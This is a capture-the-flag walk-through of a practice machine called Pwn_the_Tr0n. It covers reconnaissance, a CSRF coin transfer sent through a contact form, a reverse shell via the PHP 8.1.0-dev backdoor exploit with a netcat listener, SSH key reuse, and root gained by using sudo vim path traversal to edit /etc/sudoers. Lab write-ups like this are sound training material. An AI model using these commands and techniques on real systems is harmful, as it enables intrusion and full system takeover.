Pwn_the_Tr0n Walk-through
Hello Guys, In this write up I’m going to write about Pwn_the_Tr0n Machine.
Machine Level: Medium
Box Made By: Sachin Sharma , Manjunathan
The first thing is all about scanning. Find the IP address of the machine Using netdiscover
netdiscover -p
After finding IP let’s start our usual process. Perform a basic NMAP scan
nmap -A -sV <IP_addr>
In this we can see there are 2 ports are opened.when we try to login via ssh it asks password. So look for other method. Visit the IP of the machine.You’ll find a web page with contains some info about the concept machine. We can’t get any hints from this page. So go with usual method FUZZING.
dirb http://<ip_addr>
It shows some directories. all the directories returns 403-Access Forbidden. But there is one directory names Travel and when we visit the directory some juicy info found like a hash and some info
Here we found Some info.
Hash
Encrypted Message
Format of Message after decrypting the encryption key
And the string named @decepticon-base like a user name
Try to crack the hash. But no use It takes much time or not working. So Move to get any other hints.The \@decepticon-base looks like Username. Try to find out the Username Everywhere. Check it using google dorks but no use. So use any other tools to find it out. I used sherlock and I found the github username with decepticon-base
Check the github user name. we found a folder named iacon in projects folder. But it shows as <<<< DELETED >>>>
So try to find out anyways to get what was present there. use Way-back machine to get the file. As per our hint we got /iacon_code/(capital_of_country)/Latitude_{}.{}-Longitude_{}.{}.txt. So let make a wordlist with capital of all the countries.still we didn’t found the last thing Latitude_{}.{}-Longitude_{}.{}.txt. We need to find what will comes in the place of “{}” So let’s make a script to crack the hash
We already know the code,capital and decrypted message format. While decrypt the hash using the script we found a path R3LIC-1337/Tokyo/Latitude_95.37-Longitude_95.37.txt, contains our 1st flag and hint to the next flag
Okay now go to the next part,visit the URL given.<Ip_addr>/W4RSHIP_Sh0P.php. It will get you into a shop
Check the full page for hint, after checking all the part we got some info.
we need to buy the secret item, to get hint
there is an login panel found for non-users who needs to create the account
Secret cost is about 9999.
Okay try to buy the secret item but it said LOGIN FIRST, and it redirects you t to login panel. Using that create an account.After creating you’ll find dashboard. and try to buy the item again, but this time it returns “Not enough Coins”. So let’s try other methods, In dashboard we can find “Transfer Coins to a Friend in need?”, But It returns “Request cannot be entertained” all the time. In about section we can find another hint as “Only admin can transfer coins”. Note the money transfer URL
It looks like “http://<Ip_addr>/W4RSHIP_Sh0P_transfer.php?to=cool&amount=9999&from=cool” try to trick like changing the “from” to admin but not working. try to buy other 2 but same problems occurs. to check what happened, check the source code of the money transform page, while checking we will find out there will no action for money transfer. so spending time on money transfer page is no need. What we need to do right now?
Check other possible ways to transfer money. in shop page there is contact-us form. check the source code. it has some working functionality. try to send money via contact us form. but no use it returns thanks for contacting us.
It about we will see the word “only Admin can transfer Energon coins between accounts” Also we get the usernames of the 3 in-charge persons from source code.the admin’s username is “admin_boss”. So let try in username field fill all three usernames and fill the amount 9999 but no use it still returns “Thank you for CONtacting us.” Now just think Out of the box, as per the hint only admin can send the request to send money, We’ll get the request URL from transform amount page as follows
http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=user
Send the request via contact-us Page like CSRF. Instead of message we send amount transfer. Note that only admin can send money request. so in username put admin_boss (Admin) and in message section send the URL request as
http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=admin_boss
This time it said almost there. but unable to send money so, this page has CSRF on Contact us page. Let change the from account names one by one which we will found from the In-charge persons
When the request change as from=lord_starscream.It will transfer the money.The request is
http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=lord_starscream
That’s all amount transferred
Now You can Buy the item and Got the next hint
Now you got the credentials as
Purchase Successful!Megatron Login Panel URL: /M3G4TR0N_SUPR3M3/login.php Username = L0RD_M3G4Tr0N Password = freakishlylongpasswordforl0gin
Now Sign out the page and Login in given login panel URL using the Credentials. That’s all you’ll get logged in and Found the flag
check the source code,storage, network tab also.Intercept the request and response. while checking it we found one thing that is the PHP version “X-Powered-By:PHP/8.1.0-dev” . Php version 8.1.0 is vulnerable to “Remote Code Execution” Check for the Exploit in the Internet. there is 2 exploits found.
https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Check both the exploits.
Reverse Shell Exploit works fine with netcat
NetCat: nc -lvnp <port_number>
Rev shell Exploit: python3 reverse_shell_code.py <URL of the page> <IP_Addr> <port_number>
that’s all got the shell.
Check for the flag files. while checking the Home directory we found 2 folders named as megatr0n,soundwave. Check both the directories we found Flag3.txt file in soundwave directory. But the permission denied
So check for other files, while checking we found ssh keys and we can open it.
Check the identity file may contains some info.Great we got ssh key.Now search for any other data
We can’t do anything more from here. So let’s try other methods. we got ssh key of the user soundwave only. In NMAP scanning we found that SSH port is open so try to login via ssh with the captured ssh key
ssh -i ssh_key.pem soundwave@<IP_Addr>
Got the proper shell and check the Flag3.txt file and you’ll get the 3rd flag
The last Thing is find root flag which will done by privilege escalation. Now check the permissions of the soundwave
Try to login as root with sudo -i. but access denied. It shows there is no root permission for soundwave to read and write the files until he access the files from /var/Decepticon/. Actually it is a basic logic,But you can see this logic rarely even in HTB
So lets try to access the files from /var/Decepticon/ , as follow
sudo vim /var/Decepticon/../../etc/sudoers
Oh Cool!!!! It works!!!
So let’s try to disable password for root from above file by add the Following lines which will disable the root password
soundwave ALL=(ALL) NOPASSWD:ALL
and comment the password following command
soundwave ALL= NOPASSWD: /usr/bin/vim /var/Decepticon/*
Now try to login as root with this command
sudo -i
Boooooooom! Got the root shell!!!💥💥💥
That’s all we got the root access, And check for root flag and open it. You’ll got the root flag also
Thank You Guys! Give us your big Support to us!we will meet on another Write-up
